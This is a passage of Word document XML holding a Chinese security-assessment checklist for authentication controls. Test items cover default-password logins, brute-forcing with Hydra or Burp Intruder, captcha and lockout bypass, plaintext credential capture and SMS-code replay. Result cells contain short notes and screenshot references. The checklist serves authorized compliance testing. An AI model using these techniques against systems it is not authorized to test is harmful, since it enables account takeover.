                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="22C44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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13C5E907">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2A8964B8">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3E9C301">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3ED8274A">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>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2.敏感用户名/邮箱注册：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17671ED3">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·尝试注册包含敏感关键词（如admin、root）的用户名或邮箱，验证系统是否拦截。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73B5DBF5">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5179EC35">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3634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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="260BBB8A">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2B267327">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D1C66B9">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73B9C37">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>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3.未验证邮箱/手机号完成注册：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29DD8B13">
            <w:pPr>
              <w:pStyle w:val="52"/>
              <w:ind w:firstLine="0" w:firstLineChars="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·在注册流程中跳过验证步骤，直接提交请求，检查是否无需验证即可激活账户。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DE71C46">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1A3498AF">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35D0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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70378674">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D2E00FC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08E88C4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1.4弱密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0864E84F">
            <w:pPr>
              <w:widowControl/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:num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密码复杂度策略检查：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C5B4E1F">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·尝试设置简单密码（如123456、password），验证系统是否强制复杂度要求（大小写、特殊字符、长度）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="376089CB">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69D946F0">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="701040" cy="453390"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
                  <wp:docPr id="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pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId13"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="701040" cy="453390"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="07E1F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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F58D0D4">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D502543">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6B2782D">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7860062E">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="PingFang SC" w:hAnsi="PingFang SC" w:eastAsia="PingFang SC" w:cs="PingFang SC"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:lang w:bidi="ar"/>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2.历史密码复用测试：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07B8FB24">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·修改密码时尝试使用之前已用过的密码，检查系统是否禁止复用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E874EAC">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51D9A755">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="958850" cy="463550"/>
                  <wp:effectExtent l="0" t="0" r="12700" b="12700"/>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pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="958850" cy="463550"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7B9B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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="35CF04D6">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1F961FA">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730A4AA">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78CABCE2">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="PingFang SC" w:hAnsi="PingFang SC" w:eastAsia="PingFang SC" w:cs="PingFang SC"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="30"/>
                <w:lang w:bidi="ar"/>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3.默认密码测试：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6029D65D">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·对默认账户（如admin、guest）尝试使用常见默认密码（admin123、1234）登录。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40118800">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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7197F8DA">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="948055" cy="433705"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="4445"/>
                  <wp:docPr id="2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0"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId5"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="948055" cy="433705"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="73AB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 w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="017E7EAE">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CCE9AB2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D11956D">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1.5其他脆弱认证渠道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="690DAFE7">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1.备用认证接口测试：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="369E583B">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·检查是否存在未受保护的API或隐藏登录入口（如`/api/login`），尝试绕过主认证逻辑。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2ACF1676">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135162C0">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="951230" cy="460375"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="1587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a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="951230" cy="460375"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2106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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4281CB2F">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85C929C">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6271178D">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9285317">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2.OAuth/SSO配置错误：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FFC59A6">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·测试第三方登录（如微信、Google）是否存在配置错误导致未授权访问。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27A174DC">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注：根据现场测试情况，判断高危还是低危</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="780CE054">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722DCD8E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>不存在三方登录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="504E5906">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="951230" cy="467995"/>
                  <wp:effectExtent l="0" t="0" r="1270" b="8255"/>
                  <wp:docPr id="2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3"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="951230" cy="467995"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="76181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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D4D84F2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61F20F0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b）应具有登录失败处理功能，应配置并启用结束会话、限制非法登录次数和当登录连接超时自动退出等相关措施；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="207302B6">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1.6口令爆破</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AB9A03F">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1.7验证码绕过</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67812531">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1.8失败登录限制绕过</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E386F71">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1.9会话超时</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0DAED339">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1.爆破工具测试：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="193AD1FC">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·使用Hydra或Burp Intruder尝试高频次密码爆破，验证系统是否限制尝试次数或触发锁定机制。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14705422">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0FCCC977">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10B72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trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66CA7BB0">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0F80ACC">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6C2F140">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6B23088A">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2.验证码逻辑绕过：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FAE067C">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·通过重复使用同一验证码、删除验证码参数或禁用前端JS，测试是否可绕过验证码校验。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="123B8703">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0ABB4028">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2587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79" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D8AF7D6">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752A815">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906F136">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7B9A9150">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3.会话超时测试：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A609EAE">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·登录后长时间无操作，检查系统是否自动注销会话。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07B428A5">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22BCC613">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213D8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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="151E1513">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E1B2AFB">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c）当进行远程管理时，应采取必要措施防止鉴别信息在网络传输过程中被窃听；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="334CB80D">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1.10鉴别信息明文传输</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="485CEB6C">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1.抓包分析：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2878FE7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·使用Yakit或Burp Suite捕获登录请求，检查密码或Token是否以明文传输，包含不加盐的MD5传输。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A7BF15B">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1D3F294B">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>https证书加密</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6418FE42">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="960120" cy="165100"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="635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7"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="960120" cy="165100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="79BF8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79" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="69B36DDE">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238AD071">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1F6B3D05">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0856E652">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2.协议安全性测试：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7010A49B">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·验证远程管理是否强制使用加密协议（如SSH、HTTPS），禁止HTTP/FTP。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4987CC90">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2F3A2D2C">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="960120" cy="165100"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="635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7"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="960120" cy="165100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4E26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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5191E001">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2838" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="644B761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d）应采用口令、密码技术、生物技术等两种或两种以上组合的鉴别技术对用户进行身份鉴别，且其中一种鉴别技术至少应使用密码技术来实现。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36E3A7F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1.11短信验证码绕过</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DFDD6CD">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1.12双因子认证绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="247F2BF3">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1.验证码重放攻击：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15D5E265">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·尝试重复使用已失效的短信验证码或静态Token。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E541607">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32176025">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
